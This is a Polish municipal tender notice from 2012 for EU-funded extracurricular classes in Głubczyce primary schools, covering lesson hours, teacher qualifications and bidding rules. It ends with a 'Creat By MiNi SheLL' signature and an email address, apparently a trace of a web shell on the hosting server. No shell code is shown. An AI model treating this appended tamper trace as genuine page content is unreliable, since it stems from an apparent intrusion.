Część 63 - Przeprowadzenie zajęć rozwijających zainteresowania uczniów wybitnie szczególnie uzdolnionych w posługiwaniu się językiem obcym - język niemiecki w Szkole Podstawowej w Pietrowicach  - 30 godziny do realizacji w tym 10 godziny w roku 2012 a 20 godzin w roku 2013.
Część 64 - Przeprowadzenie zajęć rozwijających zainteresowania uczniów wybitnie szczególnie uzdolnionych w posługiwaniu się językiem obcym - język niemiecki w Szkole Podstawowej w Pietrowicach  - 30 godziny do realizacji w tym 10 godziny w roku 2012 a 20 godzin w roku 2013.
Część 65 - Przeprowadzenie zajęć rozwijających zainteresowania uczniów wybitnie szczególnie uzdolnionych w posługiwaniu się językiem obcym - język niemiecki w Szkole Podstawowej w Pietrowicach  - 30 godziny do realizacji w tym 10 godziny w roku 2012 a 20 godzin w roku 2013.

3. Zajęcia  informatyczne - 270 godzin w tym: 

Szkoła Podstawowa nr 1 w Głubczycach - 3 grupy po 30 godziny tj. 90 godzin  do realizacji  w tym 30 godzin w roku 2012 a 60 godzin w roku 2013.
Szkoła Podstawowa w Pietrowicach - 2 grupy po 30 godziny tj. 60 godzin do realizacji w tym 24 godziny w roku 2012 a 36 godzin w roku 2013.
Szkoła Podstawowa w Lisięcicach - 2 grupy po 60 godziny tj. 120 godzin do realizacji w tym 40 godziny w roku 2012 a 80 godziny w roku 2013.

Podział na części
Część 66 - Przeprowadzenie zajęć rozwijających zainteresowania uczniów wybitnie szczególnie uzdolnionych - zdolności informatyczne w Szkole Podstawowej nr1 w Głubczycach - 30 godzin do realizacji w tym 10 godzin w roku 2012 a 20 godzin w roku 2013.
Część 67 - Przeprowadzenie zajęć rozwijających zainteresowania uczniów wybitnie szczególnie uzdolnionych - zdolności informatyczne w Szkole Podstawowej nr1 w Głubczycach - 30 godzin do realizacji w tym 10 godzin w roku 2012 a 20 godzin w roku 2013.
Część 68 - Przeprowadzenie zajęć rozwijających zainteresowania uczniów wybitnie szczególnie uzdolnionych - zdolności informatyczne w Szkole Podstawowej nr1 w Głubczycach - 30 godzin do realizacji w tym 10 godzin w roku 2012 a 20 godzin w roku 2013.
Część 69 - Przeprowadzenie zajęć rozwijających zainteresowania uczniów wybitnie szczególnie uzdolnionych - zdolności informatyczne w Szkole Podstawowej w Pietrowicach - 30 godzin do realizacji w tym 12 godzin w roku 2012 a 18 godzin w roku 2013.
Część 70 - Przeprowadzenie zajęć rozwijających zainteresowania uczniów wybitnie szczególnie uzdolnionych - zdolności informatyczne w Szkole Podstawowej w Pietrowicach - 30 godzin do realizacji w tym 12 godzin w roku 2012 a 18 godzin w roku 2013.
Część 71 - Przeprowadzenie zajęć rozwijających zainteresowania uczniów wybitnie szczególnie uzdolnionych - zdolności informatyczne w Szkole Podstawowej w Lisięcicach - 60 godzin do realizacji w tym 20 godzin w roku 2012 a 40 godzin w roku 2013.
Część 72 - Przeprowadzenie zajęć rozwijających zainteresowania uczniów wybitnie szczególnie uzdolnionych - zdolności informatyczne w Szkole Podstawowej w Lisięcicach - 60 godzin do realizacji w tym 20 godzin w roku 2012 a 40 godzin w roku 2013.

4. Zajęcia rozwijające zainteresowania uczniów -  zdolności artystyczne

4.1. Zajęcia taneczne  190 godzin w tym:

Szkoła Podstawowa nr 2 w Głubczycach - 2 grupy po 64 godziny tj. 128 godzin do realizacji  w tym 48 godzin w roku 2012 a 80 godzin w roku 2013.
Szkoła Podstawowa nr 1 w Głubczycach - 1 grupa 30 godzin do realizacji  w tym 10 godzin w ro-ku 2012 a 20 godzin w roku 2013.
Szkoła Podstawowa w Lisięcicach - 1 grupa 32 godziny do realizacji w tym 12 godziny w roku 2012 a 20 godziny  w roku 2013.

Podział na części
Część 73 - Przeprowadzenie zajęć rozwijających zainteresowania uczniów - zdolności artystyczne - zajęcia taneczne w Szkole Podstawowej nr 2 w Głubczycach - 64 godziny do realizacji w tym 24 godzin w roku 2012 a 40 godzin w roku 2013.
Część 74 - Przeprowadzenie zajęć rozwijających zainteresowania uczniów - zdolności artystyczne - zajęcia taneczne w Szkole Podstawowej nr 2 w Głubczycach - 64 godziny do realizacji w tym 24 godzin w roku 2012 a 40 godzin w roku 2013.
Część 75 - Przeprowadzenie zajęć rozwijających zainteresowania uczniów - zdolności artystyczne - zajęcia taneczne w Szkole Podstawowej nr 1 w Głubczycach - 30 godzin do realizacji w tym 10 godzin w roku 2012 a 20 godzin w roku 2013.
Część 76 - Przeprowadzenie zajęć rozwijających zainteresowania uczniów - zdolności artystyczne - zajęcia taneczne w Szkole Podstawowej w Lisięcicach - 32 godzin do realizacji w tym 12 godzin w roku 2012 a 20 godzin w roku 2013.

4.2. Zajęcia muzyczne 126 godzin w tym:

Szkoła Podstawowa nr 2 w Głubczycach - 1 grupa 96 godzin do realizacji  w tym 36 godzin w ro-ku 2012 a 60 godzin w roku 2013.
Szkoła Podstawowa w Pietrowicach - 1 grupa 30 godzin do realizacji w tym 10 godzin w roku 2012 a 20 godzin w roku 2013.

Podział na części
Część 77 - Przeprowadzenie zajęć rozwijających zainteresowania uczniów - zdolności artystyczne - zajęcia muzyczne w Szkole Podstawowej nr 2 w Głubczycach - 96 godzin do realizacji w tym 36 godzin w roku 2012 a 60 godzin w roku 2013.
Część 78 - Przeprowadzenie zajęć rozwijających zainteresowania uczniów - zdolności artystyczne - zajęcia muzyczne w Szkole Podstawowej w Pietrowicach - 30 godzin do realizacji w tym 10 godzin w roku 2012 a 20 godzin w roku 2013.

4.3. Zajęcia teatralne 128 godzin w tym:

Szkoła Podstawowa nr 2 w Głubczycach - 2 grupy po 64 godziny tj. 128 godzin do realizacji  w tym 48 godzin w roku 2012 a 80 godzin w roku 2013.

Podział na części
Część 79 - Przeprowadzenie zajęć rozwijających zainteresowania uczniów - zdolności artystyczne - zajęcia muzyczne w Szkole Podstawowej nr 2 w Głubczycach - 64 godziny do realizacji w tym 24 godziny w roku 2012 a 40 godzin w roku 2013.
Część 80 - Przeprowadzenie zajęć rozwijających zainteresowania uczniów - zdolności artystyczne - zajęcia muzyczne w Szkole Podstawowej nr 2 w Głubczycach - 64 godziny do realizacji w tym 24 godzi-ny w roku 2012 a 40 godzin w roku 2013..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5, 80.41.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 80.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 28.06.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wnoszenia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dopuszcza możliwość prowadzenia zajęć danego typu przez kilku prowadzących zatrudnionych do określonych zajęć w danej placówce z zastrzeżeniem, iż osoby winne spełniać określone poniżej wymagania
Wykonawca lub osoba wyznaczona przez Wykonawcę do prowadzenia zajęć  winna  posiadać odpowiednie kwalifikacje pedagogiczne do prowadzenia wybranych zajęć  potwierdzone dyplomem lub świadectwem kwalifikacyjnym jak również potwierdzenie prowadzenia co najmniej 2 lata stażu w tego typu zajęciach                   

- do prowadzenia zajęć dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu w tym także do zagrożonych ryzykiem dysleksji - wykształcenie wyższe kierunkowe (kształcenie zintegrowane, edukacja wczesnoszkolna, edukacja elementarna, nauczanie początkowe lub kierunek dający kwalifikacje do pracy z dziećmi w kl. I - III ) z przygotowaniem pedagogicznym lub kwalifikacje do prowadzenia zajęć z zakresu terapii pedagogicznej.

- do prowadzenia zajęć dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych - wykształcenie wyższe kierunkowe (kształcenie zintegrowane edukacja wczesnoszkolna, edukacja elementarna, nauczanie początkowe lub kierunek dający kwalifikacje do pracy z dziećmi w kl. I - III) z przygotowaniem pedagogicznym, 
- do prowadzenia zajęć logopedycznych dla dzieci z zaburzeniami rozwoju mowy - wykształcenie wyższe kierunkowe (logopedia) z przygotowaniem pedagogicznym lub wykształcenie wyższe z przygotowaniem pedagogicznym i studia podyplomowe kierunek logopedia,

- do prowadzenia zajęć z gimnastyka korekcyjna dla dzieci z wadami postawy - wykształcenie wyższe kierunkowe (wychowanie fizyczne) z przygotowaniem pedagogicznym i kwalifikacje do prowadzenia gimnastyki korekcyjno - kompensacyjnej lub wykształcenie wyższe z przygotowaniem pedagogicznym - studia podyplomowe wychowanie fizyczne z gimnastyką korekcyjno-kompensacyjną lub inne wykształcenie wyższe kierunek rehabilitacja z przygotowaniem pedagogicznym, 

- do prowadzenia zajęć rozwijających zainteresowania uczniów szczególnie uzdolnionych matematycznie , przyrodniczo - wykształcenie wyższe kierunkowe (kształcenie zintegrowane, edukacja wczesnoszkolna, edukacja elementarna, nauczanie początkowe lub kierunek dający kwalifikacje do pracy z dziećmi w kl. I - III ) z przygotowaniem pedagogicznym 
- do prowadzenia zajęć rozwijających zainteresowania uczniów szczególnie uzdolnionych - uzdolnienia językowe - wykształcenie wyższe kierunkowe w zakresie nauczania języka angielskiego lub posiada kwalifikacje określone w §11 ust. 2-4 rozporządzenia Ministra Edukacji Narodowej z 12 marca 2009 r. w sprawie szczegółowych kwalifikacji wymaganych od nauczycieli oraz określenia szkół i wypadków w których można zatrudnić nauczycieli nie mających wyższego wykształcenia lub ukończonego zakładu kształcenia nauczycieli (Dz. U. nr 50 poz. 400 i z 2012 r. poz. 174. 

- do prowadzenia zajęć terapeutycznych - hipoterapia dla dzieci niepełnosprawnych. Zajęcia hipoterapii dla uczniów SP nr1 ze sprzężonymi zaburzeniami rozwojowymi - wykształcenie wyższe kierunkowe w zakresie nauczania dające kwalifikacje do pracy z dziećmi w kl. I - III z przygotowaniem pedagogicznym oraz kwalifikacje z zakresu oligofrenopedagogiki. 

- do prowadzenia zajęć rewalidacyjnych dla potrzeb 1 ucznia w SP2 który wymaga zgodnie z orzeczeniem PPP takiej pomocy - wykształcenie wyższe kierunkowe w zakresie nauczania dające kwalifikacje do pracy z dziećmi w kl. I - III z przygotowaniem pedagogicznymi oraz kwalifikacje z zakresu ologofrenopedagogiki.

- do zajęć informatycznych - wykształcenie wyższe kierunkowe (kształcenie zintegrowane, edukacja wczesnoszkolna, edukacja elementarna, nauczanie początkowe lub kierunek dający kwalifikacje do pracy z dziećmi w kl. I - III ) z przygotowaniem pedagogicznym lub wykształcenie wyższe kierunkowe w zakresie  edukacji informatycznej  lub  kwalifikacje  w zakresie nauczania informatycznego.

- do zajęć rozwijających zainteresowania uczniów - zdolności artystyczne: taneczne, muzyczne, teatralne - wykształcenie wyższe kierunkowe w zakresie nauczania dające kwalifikacje do pracy z dziećmi w kl. I - III z przygotowaniem pedagogicznym  lub przygotowanie pedagogiczne i ukończone studia wyższe kierunkowe  lub studia podyplomowe lub kurs kwalifikacyjny z zakresu edukacji arty-stycznej (muzycznej, teatralnej i ruchowej)
Dokonanie oceny spełnienia warunków udziału w postępowaniu odbywać się będzie na podstawie złożonych w ofercie wykonawcy oświadczeń i dokumentów. Zamawiający sprawdzi kompletność dokumentów, a następnie dokona sprawdzenia spełnienia warunków według formuły spełnia-nie spełnia, co musi wynikać jednoznacznie z treści oświadczeń i dokumentów.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) wypełniony druk oferty, 
2) stosowne Pełnomocnictwo - w przypadku, gdy upoważnienie do podpisania oferty nie wynika bez-pośrednio ze złożonego w ofercie odpisu z właściwego rejestru ,
3) w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, dokument ustanawiający Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia publicznego,
4) parafowany projekt umowy</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zgodnie z art.144.1 Pzp. Zamawiający przewiduje możliwośc dokonania zmian postanowień zawartej umowy w przypadku.
1.  Zakazuje się istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, z zastrzeże-niem ust.2.
2. Dopuszcza się zmianę postanowień zawartej umowy, w stosunku do treści oferty, w następującym zakresie i przy spełnieniu następujących warunków:
a)	Zmiana okresu realizacji umowy, jest możliwa wyłącznie za zgodą obu Stron umowy.
b)	Zmiany stawki podatku od towaru i usług VAT.
c)	Zmniejszenie wartości umowy,  jest możliwe wyłącznie za zgodą obu Stron umowy.
d)	W przypadku wystąpienia siły wyższej możliwa jest zmiana postanowień umowy, wymaga to jednak zgody obu Stron umowy.
e)	W przypadku wyniknięcia rozbieżności lub niejasności w rozumieniu pojęć użytych w umowie, któ-rych nie można usunąć w inny sposób, a zmiana będzie umożliwiać usunięcie rozbieżności i dopre-cyzowanie umowy w celu jednoznacznej interpretacji jej zapisów przez Strony, możliwa jest zmiana postanowień umowy, wymaga to jednak zgody obu Stron umowy.
f)	W przypadku wystąpienia zmian powszechnie obowiązujących przepisów prawa w zakresie mają-cym wpływ na realizację umowy, możliwa jest zmiana postanowień umowy, wymaga to jednak zgo-dy obu Stron umowy. 
3. Zmiany umowy, o których mowa w ust. 2 umowy, nie mogą powodować zwiększenia wartości umo-wy.
4. Zmiany umowy, o których mowa w ust. 2 umowy, wymagają formy pisemnej pod rygorem nieważ-ności. 
5.  Zmiany zakresu zajęć Podwykonawcy lub zgłoszenia udziału Podwykonawcy.
Termin wykonania przedmiotu umowy, może zostać przedłużony o czas opóźnienia, jeżeli takie opóźnienie jest lub będzie miało wpływ na wykonanie przedmiotu umowy w przypadku :
1) Zawieszenia zajęć dydaktycznych przez Zamawiającego.
2) Zaistnienie konieczności wykonania zajęć dodatkowych uniemożliwiających kontynuowanie realizacji niniejszej umowy, wówczas termin wykonania niniejszej umowy może zostać przedłużony o czas niezbędny do wykonania zajęć dodatkowych.
3) Siły wyższej.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.glubczyce.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Oświaty Kultury i Sportu
ul. Olimpijska 1
48-100 Głubczyce.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.10.2012 godzina 09:00, miejsce: Zarząd Oświaty Kultury i Sportu
ul. Olimpijska 1
48-100 Głubczyce
(sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zakup usług ralizowany w ramach projektu   Indywidualizacja  nauczania w kl. I-III w szkołach podstawowych Gminy Głubczyce realizowanego w ramach Programu Operacyjnego Kapitał Ludzki na lata 2007-2013 Priorytet IX. Rozwój wykształcenia i kompetencji w regionach. Działanie: 9.1 Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie w systemie oświaty Poddziałanie 9.1.2 Wyrównywanie szans edukacyjnych uczniów grup o utrudnionym dostępie do edukacji oraz zmniejszenie różnic w jakości usług edukacyjnych..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com